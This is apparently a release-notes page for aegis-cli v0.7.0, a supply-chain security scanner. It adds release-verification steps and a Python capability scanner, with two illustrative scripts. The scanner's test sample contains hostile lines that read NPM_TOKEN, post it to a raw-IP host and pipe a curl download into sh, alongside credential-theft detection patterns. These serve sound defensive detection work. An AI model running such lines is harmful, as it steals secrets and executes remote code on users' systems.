
qwexvf/aegis-cli

v0.7.0 Feature

This release adds 2 notable features for engineering teams evaluating rollout.

Published 1 month ago · CLI & Terminal
✓ No known CVEs patched


Topics

ast-analysis cli cve dependency-scanner security go lockfile malware-detection npm-security osv python-security sbom sca shai-hulud supply-chain-attack supply-chain-security tree-sitter typosquatting vulnerability-scanning

Affected surfaces

deps rce_ssrf

Summary

AI summary

Added a Python AST scanner for capability detection in PyPI dependencies and an ADVISORIES column to aegis snapshot show.

Full changelog

aegis-cli v0.7.0

Supply-chain security CLI for npm / bun / yarn / pnpm.

Verifying releases

All artifacts are checksummed (checksums.txt) and the checksums file
is signed via cosign keyless OIDC. To verify:

cosign verify-blob \
  --certificate-identity-regexp 'https://github.com/qwexvf/aegis-cli/.github/workflows/release.yml.*' \
  --certificate-oidc-issuer 'https://token.actions.githubusercontent.com' \
  --certificate checksums.txt.pem \
  --signature   checksums.txt.sig \
  checksums.txt
sha256sum -c checksums.txt

SLSA build provenance is attached to every artifact and can be
verified with gh attestation verify <file> --owner qwexvf (passing
--repo qwexvf/aegis-cli instead pins the check to this repository rather
than to any repository under the owner). Verify the signature before
trusting any digest in checksums.txt, and note that the identity regexp
above is unanchored: a leading ^ and a tag suffix such as @refs/tags/
make the match stricter.
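The three steps above, wrapped as a script written for this page (not part of aegis-cli): the cosign signature on checksums.txt is checked before any digest in that file is trusted, the asset digest is compared, and only then is SLSA provenance queried. It assumes Python 3.9+, cosign and gh on PATH for the online steps, all release files in one directory, the `<hex>  <name>` checksums layout that sha256sum -c reads, and an identity regexp tightened with an anchor and a vX.Y.Z tag ref; the asset name in demo_offline is hypothetical.

```python
"""Release verification helper: an added example, not part of aegis-cli.

Order matters: the cosign signature on checksums.txt must verify before any
digest in it is trusted, the asset digest must match, and only then is SLSA
provenance checked. Assumptions: assets and signature files sit in one
directory, checksums.txt uses sha256sum's `<hex>  <name>` layout, and the
identity regexp is anchored and pinned to a vX.Y.Z tag ref (the regexp in
the release notes is unanchored).
"""
import hashlib
import subprocess
import tempfile
from pathlib import Path

REPO = "qwexvf/aegis-cli"
ISSUER = "https://token.actions.githubusercontent.com"
IDENTITY_RE = (r"^https://github.com/qwexvf/aegis-cli/.github/workflows/release.yml"
               r"@refs/tags/v\d+\.\d+\.\d+$")


def parse_checksums(text: str) -> dict[str, str]:
    """Asset name -> lowercase hex digest; accepts `hex  name` and `hex *name`."""
    table: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")
        if len(digest) != 64 or not name:
            raise ValueError(f"malformed checksums line: {raw!r}")
        table[name] = digest.lower()
    return table


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_checksum(asset: Path, table: dict[str, str]) -> bool:
    """True only if the asset is listed and its digest matches exactly."""
    expected = table.get(asset.name)
    return expected is not None and expected == sha256_file(asset)


def verify_signature(release_dir: Path) -> bool:
    """cosign verify-blob on checksums.txt (needs cosign and network access)."""
    cmd = ["cosign", "verify-blob",
           "--certificate-identity-regexp", IDENTITY_RE,
           "--certificate-oidc-issuer", ISSUER,
           "--certificate", "checksums.txt.pem",
           "--signature", "checksums.txt.sig",
           "checksums.txt"]
    return subprocess.run(cmd, cwd=release_dir).returncode == 0


def verify_provenance(asset: Path) -> bool:
    """SLSA provenance via gh; --repo pins the source repository, not just the owner."""
    return subprocess.run(["gh", "attestation", "verify", str(asset), "--repo", REPO]).returncode == 0


def verify_release(release_dir: Path, asset_name: str) -> bool:
    """Signature, then digest, then provenance; the first failure stops the chain."""
    if not verify_signature(release_dir):
        return False
    table = parse_checksums((release_dir / "checksums.txt").read_text())
    asset = release_dir / asset_name
    return verify_checksum(asset, table) and verify_provenance(asset)


def demo_offline() -> dict[str, bool]:
    """Exercise the digest step on a constructed release directory (no cosign/gh).
    The asset name is hypothetical; the digest is sha256 of the empty string."""
    d = Path(tempfile.mkdtemp(prefix="aegis-verify-"))
    asset = d / "aegis_0.7.0_linux_amd64.tar.gz"
    asset.write_bytes(b"")
    (d / "checksums.txt").write_text(
        "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  " + asset.name + "\n")
    table = parse_checksums((d / "checksums.txt").read_text())
    result = {"intact": verify_checksum(asset, table)}
    asset.write_bytes(b"tampered")
    result["tampered"] = verify_checksum(asset, table)
    result["unlisted"] = verify_checksum(d / "other.tar.gz", table)
    return result
```

verify_release(Path("dist"), "<asset>") runs the full chain; demo_offline() shows the digest step rejecting both a modified file and a file that checksums.txt never listed, which is the case a plain sha256sum -c run quietly skips.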

Python AST scanner + curated release notes + advisory column in snapshot show.

Added

  • Python AST scanner (internal/infra/astscan/pyscan/) — tree-sitter-python integration. Detects the same capability set as the JS scanner across PyPI deps:
    • shell-spawn: subprocess.{run,Popen,check_output,check_call,...}, os.{system,popen,exec*,spawn*}, pty.spawn
    • dynamic-eval: eval, exec, compile, __import__
    • base64-decode: base64/codecs/binascii decode functions
    • net-egress: urllib/requests/httpx/aiohttp/socket/http.client
    • env-read: os.environ['X'] / os.environ.get('X') / os.getenv('X') (with credential-shaped name filter)
    • fs-write-outside-root: open(...,'w'/'a'), pathlib.Path.write_*, shutil.copy*/move
    • raw-ip-literal: http(s)://NNN.NNN.NNN.NNN URL strings
  • CHANGELOG-driven release notes — release.yml now extracts the matching CHANGELOG.md section per tag and passes it to goreleaser release --release-notes. Falls back to auto-generated notes when the section is missing. scripts/extract-changelog.sh is the awk-based extractor.
  • aegis snapshot show advisory column — the rendered table now has CAPS (capability count from AST + heuristics) and ADVISORIES (count + max severity, color-coded) columns. This surfaces data that has been collected since v0.2 but was never shown.
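The capability families listed above, as a stand-alone illustration written for this page (not aegis-cli's pyscan, which is Go on tree-sitter-python): a Python 3.9+ stdlib ast visitor that resolves call targets through import aliases, tags each hit with a family and line number, and is run over two constructed snippets. The name tables, the credential-name filter, the label fs-write (no project-root check, unlike the real fs-write-outside-root family), the sample code, the NPM_TOKEN name and the 203.0.113.7 address are all assumptions.

```python
"""Toy capability scanner for Python source: an added example, not aegis-cli's pyscan.
Stdlib ``ast`` (Python 3.9+) shows the approach: resolve call targets through import
aliases, then tag each hit with a capability family. Name tables are assumptions."""
import ast, re
from collections import Counter
from typing import NamedTuple

SHELL_SPAWN = {"os.system", "os.popen", "pty.spawn"}
SHELL_SPAWN_PREFIXES = ("subprocess.", "os.exec", "os.spawn")    # subprocess.*, os.execv*, os.spawn*
DYNAMIC_EVAL = {"eval", "exec", "compile", "__import__"}
BASE64_DECODE = {"codecs.decode", "binascii.a2b_base64"}         # base64.*decode matched by prefix
NET_EGRESS_PREFIXES = ("urllib.request.", "requests.", "httpx.", "aiohttp.", "socket.", "http.client.")
ENV_READ = {"os.getenv", "os.environ.get"}
FS_WRITE_PREFIXES, FS_WRITE_SUFFIXES = ("shutil.copy", "shutil.move"), (".write_text", ".write_bytes")
CRED_NAME = re.compile(r"TOKEN|SECRET|KEY|PASS|CRED|AUTH", re.I)  # credential-shaped names (assumption)
RAW_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")

class Finding(NamedTuple):
    capability: str
    line: int
    detail: str

class CapabilityScanner(ast.NodeVisitor):
    def __init__(self):
        self.aliases: dict[str, str] = {}     # local name -> canonical dotted name
        self.findings: list[Finding] = []
    def _add(self, cap, node, detail):
        self.findings.append(Finding(cap, node.lineno, detail))
    def visit_Import(self, node):             # `import subprocess as sp` -> sp: subprocess
        self.aliases.update({a.asname: a.name for a in node.names if a.asname})
    def visit_ImportFrom(self, node):         # `from os import environ` -> environ: os.environ
        self.aliases.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names if node.module})
    def _dotted(self, node):
        # `sp.Popen` -> "subprocess.Popen"; a non-Name base becomes "<expr>" so suffix matches still work
        parts = []
        while isinstance(node, ast.Attribute):
            parts.append(node.attr)
            node = node.value
        base = self.aliases.get(node.id, node.id) if isinstance(node, ast.Name) else "<expr>"
        return ".".join([base] + parts[::-1])
    @staticmethod
    def _str_arg(node, index=0):              # positional argument, if it is a string literal
        a = node.args[index] if len(node.args) > index else None
        return a.value if isinstance(a, ast.Constant) and isinstance(a.value, str) else None
    def visit_Call(self, node):
        name = self._dotted(node.func)
        if name in SHELL_SPAWN or name.startswith(SHELL_SPAWN_PREFIXES):
            self._add("shell-spawn", node, name)
        elif name in DYNAMIC_EVAL:            # "re.compile" is not "compile": no hit
            self._add("dynamic-eval", node, name)
        elif name in BASE64_DECODE or (name.startswith("base64.") and name.endswith("decode")):
            self._add("base64-decode", node, name)
        elif name.startswith(NET_EGRESS_PREFIXES):
            self._add("net-egress", node, name)
        elif name in ENV_READ:
            var = self._str_arg(node)
            if var and CRED_NAME.search(var):  # only credential-shaped names fire
                self._add("env-read", node, f"{name}({var!r})")
        elif name == "open":
            mode = self._str_arg(node, 1) or "r"
            if any(c in mode for c in "wax+"):
                self._add("fs-write", node, f"open(mode={mode!r})")
        elif name.startswith(FS_WRITE_PREFIXES) or name.endswith(FS_WRITE_SUFFIXES):
            self._add("fs-write", node, name)
        self.generic_visit(node)
    def visit_Subscript(self, node):          # os.environ['X']
        key = node.slice
        if (self._dotted(node.value) == "os.environ" and isinstance(key, ast.Constant)
                and isinstance(key.value, str) and CRED_NAME.search(key.value)):
            self._add("env-read", node, f"os.environ[{key.value!r}]")
        self.generic_visit(node)
    def visit_Constant(self, node):
        if isinstance(node.value, str) and RAW_IP_URL.search(node.value):
            self._add("raw-ip-literal", node, node.value)

def scan_source(source: str) -> list[Finding]:
    scanner = CapabilityScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings

def capability_counts(source: str) -> dict[str, int]:   # what a CAPS column would summarise
    return dict(Counter(f.capability for f in scan_source(source)))

# Constructed samples, not real packages; 203.0.113.0/24 is documentation address space.
SUSPICIOUS = '''
import os, base64, subprocess as sp
from urllib.request import urlopen
exec(compile(base64.b64decode("aW1wb3J0IG9z"), "<s>", "exec"))
token = os.environ.get("NPM_TOKEN")
urlopen("http://203.0.113.7/collect?t=" + token)
sp.Popen(["sh", "-c", "curl -s http://203.0.113.7/x | sh"])
'''
BENIGN = '''
import os, re
from pathlib import Path
pattern = re.compile(r"^v[0-9]+")
home = os.environ.get("HOME")
data = Path("config.json").read_text()
'''
```

scan_source(SUSPICIOUS) yields eight findings across six families, while scan_source(BENIGN) yields none: re.compile resolves to "re.compile" rather than the builtin, HOME fails the credential-name filter, and read_text is not a write. Resolving through aliases is what keeps `from subprocess import Popen as P` from slipping past a name-only check.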

Changed

  • astscan.isAnalyzable recognises .py files for EcoPyPI deps so the dispatcher routes them to pyscan.
  • Composition root (cmd/aegis/risk_engine.go) registers the Python scanner alongside the JS one. Best-effort: if pyscan init fails, the rest of the gate keeps working with a stderr warning.

Tests

  • 662 tests pass under the race detector across 25 packages (+41 since v0.6, all in pyscan).
  • Pyscan tests cover every capability family with a positive + a negative case (benign code does NOT fire).

Coverage status

With v0.7, both JS and Python deps get full AST capability detection in addition to OSV vulnerability lookup and the 7 behavior-based heuristics. Rust / Go / Ruby still get OSV + (some) heuristics, but no AST scanner yet.

Apache-2.0 — see LICENSE.
